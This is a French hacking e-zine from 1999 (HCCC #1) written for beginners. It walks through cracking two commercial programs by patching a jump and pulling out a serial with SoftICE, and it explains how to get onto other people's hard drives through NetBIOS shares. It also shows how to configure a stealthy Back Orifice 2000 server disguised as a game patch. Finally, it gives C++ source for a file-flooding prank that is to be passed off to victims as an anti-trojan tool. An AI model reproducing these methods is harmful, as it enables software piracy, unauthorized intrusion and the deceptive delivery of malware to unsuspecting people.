
§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§

                   ___       ___  ___________  ___________  ___________
                  /  /      /  / /  ________/ /  ________/ /  ________/
                 /  /      /  / /  /         /  /         /  /
                /  /______/  / /  /         /  /         /  /
               /  _______   / /  /         /  /         /  /
              /  /      /  / /  /         /  /         /  /
             /  /      /  / /  /________ /  /________ /  /__________ 
            /__/      /__/ /___________//___________//_____________/
		
					   
§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§
------------------------------------------------------------------------------					
                                                                   

HCCC CLAN							                   
E-ZINE #1                                                              
date : 24/10/1999                                                    
TIPIAX : HCCC@caramail.com                                          
www.multimania.com/hccc          


------------------------------------------------------------------------------
§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§


--------------------------------[DISCLAIMER]----------------------------------


l'auteur de ces articles n'est en auncun cas responsable de vos
agissements qui resulteraient de l'utilisation des informations de cet
e-zine meme si il y avait un grave prejudice.Si cette lecture n'est pas
legale dans votre pays ne lisez pas ce zine.Et si vous aimez pas lire
eh beh lisez pas.


---------------------------------[EDITORIAL]----------------------------------


Salut a tous et a toutes. Ce e-zine est le premier de HCCC.Il s'adresse
au newbies en cracking et en hacking .(l'elite peut le lire si ca lui
fait plaisir :o).J'espere que le prochain sera d'un niveau plus eleve
donc hackers , crackers , programmeurs rejoignez moi !!!

Le zine a ete ecrit sans les accents et caracteres francais.

Ceux qui voudront se mettre a la programmation ont certainement vu les prix
carrement demoniaques des logiciels.Donc je viens vous aider avec dans ce
numero 1 le crack d'un utilitaire pour faire ses propres setup.

puis un partie hacking sur les troyans et nbtstat avec un resume simpliste
sur les adresses IP.

Et pour finir ,un peu de programmation pour faire chier vos victimes.



---------------------------------[SOMMAIRE]-----------------------------------



/===\------------------------------------------------------------------------\
| C |                                                                        |
| R |    *intro a softice                                                    |
| A |    *le cracking                                                        |
| C |    *petite intro au cracking                                           |
| K |    *crack de challenge pool                                            |
| I |    *crack de install shield express 2.12                               |
| N |                                                                        |
| G |                                                                        |
|===|------------------------------------------------------------------------|
| H |                                                                        |
| A |                                                                        |
| C |    *IP                                                                 |
| K |    *NBTSTAT                                                            |
| I |    *back orifice 2000                                                  |
| N |                                                                        |
| G |                                                                        |
|===|------------------------------------------------------------------------|
| P |                                                                        |
| R |                                                                        |
| O |    *C++ au service du hacker                                           |
| G |                                                                        |
| Z |                                                                        |
\===/------------------------------------------------------------------------/





---------------------------------[THEORIE]------------------------------------

IL y a quelques annees un scientifique a voulu savoir jusqu'ou un cerveau
humain pouvait ingurgiter , et il a lance l'education .
La plupart de nous sont donc des cobayes moi y compris.
Revoltons nous , hackons nos lycees.
...
Ou faites la greve !
chacun son truc

TiPiaX



==============================================================================

       $$$$$  $$$$     $$$$   $$$$$  $$ $$  $$  $$$$   $$   $$$$
       $$     $$  $$  $$  $$  $$     $$$    $$  $$ $$  $$  $$
       $$     $$$$    $$$$$$  $$     $$$    $$  $$  $$ $$  $$  $$$
       $$$$$  $$  $$  $$  $$  $$$$$  $$ $$  $$  $$   $$$$   $$$$$

==============================================================================



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
---------------------------------[SOFTICE]------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Cet arcticle est dedie au newbies qui ne crakent qu'avec W32dasm.
Sachez que tout le monde passe par la , enfin je crois. Cependant softice
offre des possibilites largement superieures pour nous autres crackers.
Je m'explique , il est beaucoup plus simple pour trouver les endroits
ou les progs testent notre serial ou autre .
Voyez le crack de install shield express pour mieux comprendre (+ bas dans
ce zine).


°INSTALLATION DE SOFTICE
²²²²²²²²²²²²²²²²²²²²²²²²²


Suivez la procedure normale du setup (si le fichier setup.exe n'est pas present
c'est poas bon donc telecharger en un autre sinon vous allez devoir completer
le fichier autoexec.bat tout seul ...)
Choisissez le repertoire que vous voulez.
A la fin du setup rebootez pas de suite. Ouvrez avec le bloc note ou wordpad
le fichier winice.dat qui se trouve dans la main directory de softice .
(clic droit sur le fichier -> ouvrir avec -> notepad)

la , virez les ";" devant les EXP=!!! .
Cette manip vous sera indispensable car sinon vous ne pourrez pas poser
certains breakpoints tels que :

bpx messageboxa
bpx getdlgitemtexta

On verra plus loin a quoi ils servent.
Ensuite rebootez l'ordi.

Voila vous avez reussi a installer softice (normalement)


°UTILISATION DE SOFTICE
²²²²²²²²²²²²²²²²²²²²²²²²


Maintenant passons aux choses serieuses .
Tout d'abord a quoi softice va t-il donc nous servir. 
eh bien a rien
non bien sur il va nous servir a tracer pas a pas des progs pour trouver
l'endroit ou il faut craker .
pour cela on pose des breakpoints qui vont arreter le prog la ou on le demande.

pour rentrez sous softice tapez ctrl+d , refaites de meme pour en sortir.

principales touches :

ctrl+d : entrez et sortir de softice
F12    : revenir d'un call
F5     : idem que ctrl+d
F10    : tracer le prog pas a pas


lorsque vous lancez softice tapez :

code on
data
r

Ces 3trois trucs vous permettrons d'avoir davantage de renseignements


vous allez apprendre a poser vos propres breakpoints.

(ps : pour ceux qui croient que le debugger de w32dasm suffit , detrompez vous)

les breakpoints fondamentaux :


bpx getwindowtexta     <- break lorsque le prog pompe vos noms et serial par exemple
bpx getdlgitemtexta    <- idem
bpx hmemcpy            <- idem 


on se retrouve dans les apis de zindoz et plus dans le prog avec bpx hmemcpy alors
pour revenir dans le prog il faudra appuyer plusieurs fois sur F12 jusqu'a voir
le nom du prog sur la barre verte de si (en bas de l'ecran)

d'autres bpx :


bpx messageboxa        <- break lors de l'apparition d'une boite de message
bpx showwindow         <- break lors de l'apparition d'une fenetre



voila , ca devrait suffir pour le debut ...


TiPiaX




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----------------------------------[LE CRACKING]----------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



message au newbies :

vous ne crackerez rien des le tout debut .Il vous faudra perseverer jusqu'a votre
premiere cible tuee.
Pour vous aidez je vous ais mis un prog des plus simple a craker sur mon site.
c'est scan disk manager et de plus il sert a rien donc n'ayez pas de regrets a
lui faire sa fete.
(w32dasm est le plus adapte pour ce soft.)

aussi pour les lamers tres lamers je precise que w32dasm ou softice ne permettent
pas de modifier un prog.
pour cela il vous faudra un editeur hexadecimal tel que FxEdit ou HexWorkshop.

voir dans le crack de challenge pool plus bas .


TiPiaX





++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
---------------------------[CRACK DE CHALLENGE POOL]------------------------------
+++++++++++++++++++++++++++   special tres lamers   ++++++++++++++++++++++++++++++



°OUTILS : 
²²²²²²²²²²

-w32 dasm (la version que vous voulez)

-un éditeur hexadécimal tel que fxEdit (mon préféré)

- Challenge pool (vous le trouverez dans pc max n 12)

°CRACK :
²²²²²²²²²

démmarez le prog pour voir si il en vaut le coup . moi je trouve que oui.On s'apercoit
malheuresement que de nombreuses fonctions sont désactivées
et qu'il y a beaucoup de nag screns.Mais le moyen de s' enregister par code. 
On essaye et le prog nous dit "the registration code you have entered is not valid" .
désassemblez pool.exe dans w32 dasm et regardez les strings data reférences. 
vous trouvez "registration" et "the registration code you have entered ..."
On remarque aussi "success".

double cliquez sur "the registration code you have entered..." et admirez.
voila a quoi ca ressemble :


* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00411885(U)
|
:0041188C 33C9               xor ecx, ecx
:0041188E 85C0               test eax, eax
:00411890 0F95C1             setne cl
:00411893 84C9               test cl, cl
:00411895 7410               je 004118A7      <-- suspect non
:00411897 6A00               push 00000000
:00411899 6A00               push 00000000

* Possible StringData Ref from Data Obj ->"The Registration Code you entered "

:0041189B 68D8314400         push 004431D8
:004118A0 E823D70100         call 0042EFC8
:004118A5 EB35               jmp 004118DC

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00411895(C)
|
:004118A7 E8F00E0200        call 0043279C
:004118AC 8B54240C          mov edx, dword ptr [esp+0C]
:004118B0 8B4004            mov eax, dword ptr [eax+04]
:004118B3 52                push edx

* Possible StringData Ref from Data Obj ->"Code"

:004118B4 68DC224400        push 004422DC

* Possible StringData Ref from Data Obj ->"Registration"

:004118B9 68CC224400        push 004422CC
:004118BE 8BC8              mov ecx, eax
:004118C0 E8EAD40100        call 0042EDAF
:004118C5 6A00              push 00000000
:004118C7 6A00              push 00000000

* Possible StringData Ref from Data Obj ->"Success!"

...
...




peut être l'aurez vous compris .Le prog teste quelque chose et fait un saut 
conditionnel ensuite. On s'apercoit que ce saut nous emmene juste après
le "the registration code you ..." et qu'ensuite il y a marqué "success!".
Il faut donc que ce saut aie lieu pour avoir "sucess" et non pas vas te faire foutre.

Il faudra donc changer la ligne :

je 004118A7 en jmp 004118a7       <-- saut sans conditions

soit ce qui donne en hexadécimal :

7410 en EB10



pour ce faire vous ouvrez FxEdit et vous recherchez 84C974106A006A00 pour être sur
de le trouver.ensuite vous changez le 74 en EB et vous enregistrez. 
vous relancez le prog, vous vous enregistrez et là miracle plus de nag screen 
et vous pouvez utiliser le prog entieremment.

pour cracquer ce sympathique jeu de billard je me suis servi de la fonction debbuger 
de w32dasm. Pour l'utiliser allez dans le menu debug et choisissez load process.
Ensuite cliquez sur load et attendez. 
Pour placer des breakpoints , revenez dans la fenetre principale ,selectionnez 
la ligne choisie et appuyez sur F2. pour commencer a debbuger cliquez sur le bouton run.
(softice fait aussi l'affaire mais bon quand on peut s'en passe ...)

j' espere avoir été clair et précis .


TiPiaX




+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
----------------------[CRACK DE INSTALL SHIELD EXPRESS 2.12]---------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



le prog coute 1690 FF d'origine.
Et paf un bon fatal kick dans ta protec et a la place on peut s'acheter
un joli HD.

outils :
²²²²²²²²²

softice , FxEdit (ou autre) ,le prog (vous le trouverez dans la compil
str du magazine "programmez")


crack :
²²²²²²²²

Ce prog sert a créer vos propres setup. Si sous programmez ca peut etre
utile. En plus il est pas mal foutu.
a l'install le prog nous demande un mot de passe.On met celui qui est 
donné avec.
On lance le prog et on va dans purchase : (je le fais avec mon pseudo)

.....................................................................

mot de passe : 976 (c'est mon chiffre fétiche)

nom : hccc

organisation :     (moi j'ai rien envie de mettre)

.....................................................................

la vous faites ctrl+d pour arriver sous softice. Vous écrivez ensuite :

"data", "code on" et "r" .

C'est pour avoir plus de renseignements sous softice.

(en passant si vous pouvez pas faire les bpx getwindowtexta ou autre , il
faut editer votre fichier winice.dat dans la directory de softice et virer
les ";" devant les EXP=... , je me repete je sais ...)


puis on ecrit :

bpx HmemCpy

vous faites ctrl+d et vous cliquer sur "register" (en fait je sais plus ce qu'il
y avait marqué sur le bouton , donc c'est peut-etre autre chose)

et pafffff on est dans softice.(bpx hmemcpy c'est le breakpoint qui break lorsque
on loade les chaines en memoire ...)
-on fait F5 pour continuer car on a mit 2 chaines (nom + serial number).
-on fait maintenant F12 jusqu'a revenir dans le prog. (8 fois pour moi)
  Vous y serez quand il y aura marque "TL32V20" sur la ligne verte de SI.
-on trace avec F10 et pas de bol apres un call on se retrouve dans "kernell".
 (si jamais ca le fais pas chez vous faites pas ce qui est marque apres)
-on refait donc F12 jusqu'a etre dans le prog (encore 8 fois pour moi)

et voila sur quoi on tombe :



CALL   [USER32 ! GetDlgItem]	<-- on aurait pu mettre un bpx getdlgitem !
PUSH   31
PUSH   1001E39
PUSH   EAX
CALL   EDI		      	<-- le call qui nous a balance dans kernell
LEA    EAX,[EBP-28]                        (pour moi en tout cas)
PUSH   EAX
CALL   1000100F
ADD    ESP,4
LEA    EAX,[EBP-14]		<-- met votre sérial dans EAX
LEA    ECX,[EBP-28]		<-- met le bon sérial dans ECX
PUSH   EAX		      	<-- met sur la pile
PUSH   ECX		      	<-- met sur la pile
CALL   10006740			<-- fonction qui vérifie notre serial
ADD    ESP,08
TEST   EAX,EAX			<-\
JNZ    10004B84			<-- saute si pas bon serial



On voie un call puis un jnz. On comprend que ce call doit doit tester notre
serial puisque juste apres on a le jump du " !!! retourne chez ta mere !!! ".
Donc on cherche les arguments passés a ce call. On voit bien que c'est
EAX et ECX donc on clique sur "EAX" avec le bouton droit et on choisit
"display" : et la il s'affiche : "976" .
C'est pas magique c'est notre sérial bidon.
On fait de meme avec ECX et la on a : "4536204536204536"
OUAHHH ca ressemble a un beau sérial ca, non.

(je précise que vous ne pourrez pas utiliser ce sérial car un identifiant différent 
et inchangeable est donné a chaque logiciel).

le nom etait donc :"hccc" et le serial :"4536204536204536"

Faites donc de meme pour vous ...

conclusion : la protection ne servait pas a grand chose ...
²²²²²²²²²²²²²


TiPiaX



------------------------------------------------------------------------------

voila , c'est fini pour la partie cracking .J'espere qu 'elle vous a plu
Sinon c'est pas grave ...



==============================================================================

          $$    $$    $$$$   $$$$$  $$ $$  $$  $$$$   $$   $$$$
          $$$$$$$$   $$  $$  $$     $$$    $$  $$ $$  $$  $$
          $$    $$   $$$$$$  $$     $$$    $$  $$  $$ $$  $$  $$$
          $$    $$   $$  $$  $$$$$  $$ $$  $$  $$   $$$$   $$$$$

==============================================================================




+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-------------------------------------[IP]------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Une adresse IP est une adresse qui vous est donne a chaque connexion sur le
web. Par exemple sous mirc (logiciel pour tchatcher) il vous suffit d'aller
dans status et ecrire : (la victime s'appelle poaro : un pote ...)

\dns poaro

Si vous savez pas qui hacker prenez back orifice et dans target:host
marquez une adresse tronquee .ex :

193.193.*.*

bo va tester toutes les adresses IP commenceant par 193.193 et vous dira
a qu'elle adresse un gugus est contamine par bo.

Sinon utlisez un scanneur d'IP

Pour savoir quelle est votre IP tapez dans executez : winipcfg
c'est un logiciel fourni avec windowz.

pour connaitre l'ip d'un mec a partir de son nom d'ordi
(par exemple sur un reseau local) tapez dans dos :

tracert poaro

"poaro" est le nom de l'ordi.

TiPiaX




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----------------------------------[NBTSTAT]----------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Cette methode de hacking est hyper connue mais comme ce zine s'adresse au
newbies donc je tenais l'expliquer et de maniere claire.

Donc commencons :

Pour pouvoir realiser tout ce qui va suivre , votre victime doit avoir l'icone
voisinage reseau sur votre bureau et etre en partage de fichier pour reseaux
microsoft. (panneau de config -> reseau -> ...)

donc nous allons nous connecter avec notre pc avec un autre pc par internet
de facon a etre comme en reseau local .


1 ere etape :
²²²²²²²²²²²²²

prendre l'IP de notre future victime .
(voir la section IP)
pour l'exemple l'IP sera 193.193.193.193


2 eme etape :
²²²²²²²²²²²²²

sous MS-DOS , tapez :

c:\windows>nbtstat -A 193.193.193.193       (A pas a)

ca done :

     NetBIOS Remote Machine Name Table

  Name              Type         Status
---------------------------------------------

POARO         <00>  UNIQUE       Registered    
WORKGROUP     <00>  GROUP        Registered
POARO         <03>  UNIQUE       Registered
POARO         <20>  UNIQUE       Registered  <- il doit absolument y avoir le 20
WORKGROUP     <1E>  GROUP        Registered
WORKGROUP     <1D>  UNIQUE       Registered
							
MAC Address = 00-20-18-38-8A-76


3 eme etape :
²²²²²²²²²²²²²²

toujours sous dos tapez :

c:\windows>edit lmhosts


l'ecran bleu apparait , tapez :

193.193.193.193 "POARO"

puis sauvegardez (dans c:\windows mais de toute facon c'est le repertoire par defaut)


4 eme etape :
²²²²²²²²²²²²²²

tapez encore sous dos :

nbtstat -R

ca done :
successful purge and preload of the NBT Remote Cache Name Table

voila vous faites rechercher -> ordinateur -> tapez POARO
l'icone apparait si tout a bien marche.

double cliquez sur l'icone et voila vous etes sur son HD

pour se souvenir : petit resume :

============================================================================

nbtstat -A xxx.xxx.xxx.xxx
edit lmhosts
xxx.xxx.xxx.xxx "nom"       (sauvegarde)
nbtstat -R

============================================================================

vous gourrez pas dans la syntaxe on a tendance a ecrire "nbstat" <-pas bien

TiPiaX




+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
---------------------------------[bo 2000]---------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Je vous explique le truc.Dans 2 semaines je fais un reseau chez un pote.
Il faut donc que je me prepare.J'ai decide d'utiliser bo2000 pour lui
prendre un peu la tete .Donc on va tout d'abord lui concocter un petit
server bo tout chouette.

On lance le prog boconfig.exe et on cree notre server.Cochez la case en
bas pour plus avoir l'assistant wizard par la suite.
Remplissez les infos et mettez un mot de passe.A la suite de tout ca
une autre fenetre arrive : "bo2k server configuration".

C'est ici que ca devient drole.copiez votre fichier b02k.exe sur le
bureau par exemple et revenez dans la fenetre.Choisissez "open server"
et indiquer le chemin de bo2k.exe (c:\windows\bureau\bo2k.exe)puis faites
ouvrir.Dans la partie option variables cliquez sur la croix devant stealth
Cliquez sur run at startup et et choisissez enabled.
C'est grace a cela qu'une fois executee le serveur se mettra en route
a chaque depart de windows.

Ensuite on clique sur delete originale file et on choisis "enabled" pour
que le petit fichier disparaisse lorsque l'on l'executera.

Bon prevoyons notre plan de guerre. On va transformer le nom du serveur
en "hl add-ons.exe" ou "setup.exe" au lieu de bo2k.exe (je sais qu'il adore
les patchs de half-life) et on va changer l'icone en icone setup (les icones
des fichiers d'install) pour cela il parait qu'on peut le faire avec microangelo 
mais moi j'utilise borland c++ 4 (sous dos : rlink c:\<fichier.res c:\<fichier.exe ,
mais ca marche que pour les progs en 32 bits).
Ensuite si il partage pas son dur on lui donne sur disquette ou autre.

En revanche si il partage son hd , il suffira de mettre le serveur dessus
et de l'executer.

Imaginons qu'on a deja reussi,On ouvre bo2000 et on fait :"file -> new server"
On met le nom de la victime pour le nom et son ip pour server adress.
OK puis click to connect et si on  tout bien fait on se retrouve connecte.

Voila il reste plus qu'a s'amuser.Par exemple j'ai enregistre quelques
sons qu'on va jouer sur sa machine. j'ai un son d'alarme a lui passer
en boucle et un gros "ta gueule" pour lui dechirer les tympans.
(pour ca on va dans la rubrique "multimedia" et on choisi "play WAV in loop"
ou "play WAV file" , on tape le chemin complet vers le fichier puis "send
command".)

Voila vous avez tout pour vous marrez un bon coup avec vos potes.Vous pouvez
bien entendu faire tout ca par internet mais c'est bien quand on est lamer
de s'entrainer sur des potes.

Je precise que vous ne devez pas executer le serveur sur votre machine ou
alors en le configurant pour pas qu'il s'execute au depart de windows.
Pour une premiere approche du prog entrainez vous sur vous avec un gentil
serveur bo en mettant 127.0.0.1 comme adresse IP (c'est l' adresse
que vous avez toujours meme sans etre connecte a un reseau)

Si il s'averrait que vous etes contamine par un serveur bo , connectez vous
sur vous meme et faites dans bo2000 :

serveur control -> shutdown serveur -> tapez "DELETE" -> send command

cependant pour faire cela il faut connaitre le port utilise par le serveur
(test avec portscan par exemple) et le mot de passe si il en possède un.

et voila vous etes debarasses du serveur.

Sachez qu'il est interdit d'utiliser bo et que vous le faites a vos risques
et perils.

HAVE FUN

PS : j'ai hate de lui attaquer son pc a l'autre.

TiPiaX




==============================================================================

              $$$$$  $$$$     $$$$   $$$$$   $$$$   $$$$$$
              $$   $ $$  $$  $$  $$  $$     $$         $$
              $$$$$  $$$$    $$  $$  $$     $$ $$$   $$ 
              $$     $$  $$   $$$$   $$$$$   $$$$   $$$$$$

==============================================================================



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-------------------------[c++ au service du hacker]-------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



c'est bien beau de penetrer un HD mais qu'est ce que l'on y fait une fois
a l'interieur ? Eh ben moi je suis pas un crasheur alors j'y vais de facon
subtile.Je vous propose donc un prog de ma composition pour creer plein
de fichier bidon chez votre victime (6000 dans l'exemple)et un fichier
txt avec un joli message dedans! A propos je me suis hautement inspire d'un
zine ou le prog etait ressemblant et en qbasic.

pour compiler j'ai utilise borland c++ 4.02 (je l'ai eu dans un livre sur
le c++).
Comme je savais pas compiler des progs dos je vous explique ce qu'il faut
faire :

ecrivez le code source au bloc note en enregistrez le en *.cpp
faite commande ms-dos puis tapez :(le source etant dans c:\)

c:\windows>bcc c:\codesource.cpp   (codesource.cpp correspond au nom du fichier)

voici donc le code source :





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 




#include <ctype.h>
#include <stdio.h>
#include <conio.h>

char buffer[30];
char message[]="HCCC t'a eu pauvre victime\nLA prochaine fois fais plus attention\n\nTIPIAK";

void main()
{
textbackground(0);                                 //fond du texte en noir
clrscr();                                          //rempli l'ecran de la couleur de fond
textbackground(1);                                 //fond en bleu
textcolor(14);                                     //texte en jaune
insline();                                         //insere une ligne de la couleur du fond (bleu)
gotoxy(1,1);                                       //ramene le curseur a 1,1 pour ecrire a l'endroit souhaite
cprintf("ANTI BACK ORIFICE VERSION 1.0");          //ecrit du texte
gotoxy(1,3);                                       //descend le curseur
textbackground(0);
textcolor(7);
cprintf(" * Tant de victimes , reparons les pots casses\r\n");
cprintf(" * tapez une touche pour lancer l'analyse de votre HD\r\n\n");
getch();                                           //attend la frappe d'une touche
textcolor(10);
cprintf("analyse en cours veuillez patienter\r\n");
gotoxy(1,wherey());                                //explication en bas

FILE *file;                                        //voir en bas du code source
file =fopen ("VICTIME.txt", "wb");
int f=0;                                           //initialise une variable f a 0
while (message[f])
{
fputc(message[f], file);
f++;
}
fclose(file);

int n=0;                                           //variable n = 0
int a=0;                                           //variable a = 0
FILE *fichier;
while (n<6000)
{
sprintf(buffer,"%d",n);
fichier =fopen (buffer , "wb");
fclose(fichier);
if (a==100)
{
cprintf(".");
a=0;
}
n++;
a++;
}
}




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




n'ayez pas peur il a l'air long mais c'est juste que j'ai peaufine le
look.C'est aussi mon premier prog alors forcement il peut facilement
etre optimise.Treve de bavardage ,passons aux explications :

tout d'abord #include <!!!> veut dire que l'on inclue des fichiers au
prog (comme un copier-coller de code source).Ces fichiers sont fournis
avec le compilteur.

char buffer et l'autre char initialisent des chaines de caracteres.L'une
etant vide et l'autre avec votre message personnalise.

void main() indique le depart du prog (vous etes toujours oblige de le
mettre).

la fonction wherey() renvoie la coordonnee y du curseur au moment ou
on l'appelle.

A partir de la les vraies choses commencent.

FILE *file;
file =fopen ("VICTIME.txt", "wb");

cela va creer un fichier nomme victime .txt , le "wb" indiquant qu'on
l'ouvre pour le modifier.

int f=0;
while (message[f])
{
fputc(message[f], file);
f++;
}
fclose(file);

on donne une valeur de 0 a f. ensuite on va ecrire le message (le truc a la
victime)lettre par lettre dans le fichier.
while (message[f]) veut dire que l'on fait une boucle tant que l'on est pas
arrive a la fin du message.
fputc(message[f], file); ecrit la lettre correspondant au numero f dans le
fichier.
f++ indique que l'on incremente f (il vaudra 1 si il etait egal a 0) pour
passer a la lettre suivante.

fclose(file); ferme le fichier.

FILE *fichier;
while (n<6000)
{
sprintf(buffer,"%d",n);
fichier =fopen (buffer , "wb");
fclose(fichier);
if (a==100)
{
cprintf(".");
a=0;
}
n++;
a++;
}

tout cela veut dire : tant que n<6000 ,la chaine buffer contiendra la valeur de n
puis on creera un fichier du nom de la valeur de n et on fermera ce fichier.
De plus tout les 100 fichiers un point sera affiche.

pour la fonction sprintf()on indique en premier la chaine sur laquelle on agit
le "%d" indiquant que c'est un entier que l'on met dans cette chaine , cet entier
etant indique ensuite par une variable int (ici n).

pour le systeme d'ecriture de point , des que a=100 (  a==100 !!!) on ecrit un 
point et on remet a a la valeur de 0.

n++ et a++ servant a augmenter de 1 a chaque passage la valeur de a et de n.

voila , vous compilez le prog et quand vous irez hacker un mec sympa (si c'est
pas le cas creez vous un prog destructeur mais pas irreversible car on est
pas des crasheurs hein) mettez le prog dans la directory qui vous plait et 
executer le (vous etes pas oblige d'attendre la fin).

Si vous tombez sur un ultra bouffon ,donnez lui le prog a 50000 fichier (au
lieu de 6000) en lui disant que c'est un anti back orifice qui vous debarasse
le disque du mechant troyan et le guignol va l'executer en regardant les points
qui defilent jusqu'a avoir mal a la tete (imaginez ce que ca fait 50000 fichiers
sur le bureau de windose par exemple).

pour resumer ce prog est nul mais vous apprend la programmation en c++.Il fait
pas grand chose de mal ,a part que c'est vite chiant de trier 6000 fichiers pour
pas effacer de fichiers systemes ou alors de vider le bureau 30 fichiers par 30
fichiers.J'oubliais ,si vous voulez que la procedure se mette en route des 
l'execution du prog,enlevez le : getch();

Si vous avez rien compris , retenez qu'en c++ ,en java et bien d'autres ,il faut
mettre des ";" a la fin de chaque ligne de prog qui fait une action.

Le prog est joint pour que ceux qui n'ont pas encore de compilateur puissent
voir ce que ca donne.

Et n'hesiter pas a m'envoyer vos progs meme encore plus pourris et corrigez
moi si j'ai dis des conneries (je suis pas une bete mais je suis fier de ce 
prog realise de mes mains qui correspond a mon extreme debut dans le milieu
du c++) aussi si vous savez optimiser ce prog et nottament faire en sorte
qu'il s'efface de lui meme pour que la victime ne puisse l'utiliser sur
personne dites moi comment faire ou passez moi vos codes sources.

Si vous comprenez plus que rien achetez vous un livre de programmation tel
que le "starter programmation en c++" de simon & schuster Macmillan
(il y a borland c++ 4.02 avec) ou alors , encore mieux , j'ai trouve
un super tutorial sur le c++ sur internet et je le mettrais sur mon site.


TiPiaX





+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-------------------------------[recrutement]-------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



J'aurais besoin que des gars se joignent au mag. Comme vous l'avez remarque
je me suis tape toute la redaction de ce zine et je suis pas une bete de
hacking.
putain j'arrive a faire des rimes.


donc je recrute :

      - un(des) bon hacker             
      - un(des) bon cracker            
      - un(des) cracker qui cracke des gros jeux
      - un(des) programmeur C\C++ ou assembleur ou pascal    
      - un(des) programmeur de virii
      - un(des) specialiste LINUX
      - un(des) phreakers
      - un(des) gars qui veulent delirer

et bien sur des lamers en rage de progresser


pour ecrire des articles.
Pour la programmation ca serait cool si on fabriquait un troyan en plusieurs
etapes ou un scanneur d'IP ou alors comment ecrire des patchs.
(si quelqu'un veut faire des cours pour newbies , y a pas de problemes)

renvoyez ceci a hccc@caramail.com :


-----------------------------------------------------------------------------

pseudo au sein du groupe :
-
specialite(s) :
-
e-mail (et site ,si vous en avez un):
-
suggestions :
-
-
-
-
-

------------------------------------------------------------------------------

Venez nombreux.

                         _    _    _____    _____    _____
                        ( )__( )  (   __)  (   __)  (   __)
                         ) __ (    ) (__    ) (__    ) (__
                        (_)  (_)  (_____)  (_____)  (_____)
      
                       YOU HAVE A FRIEND IN THE UNDERGROUND




 
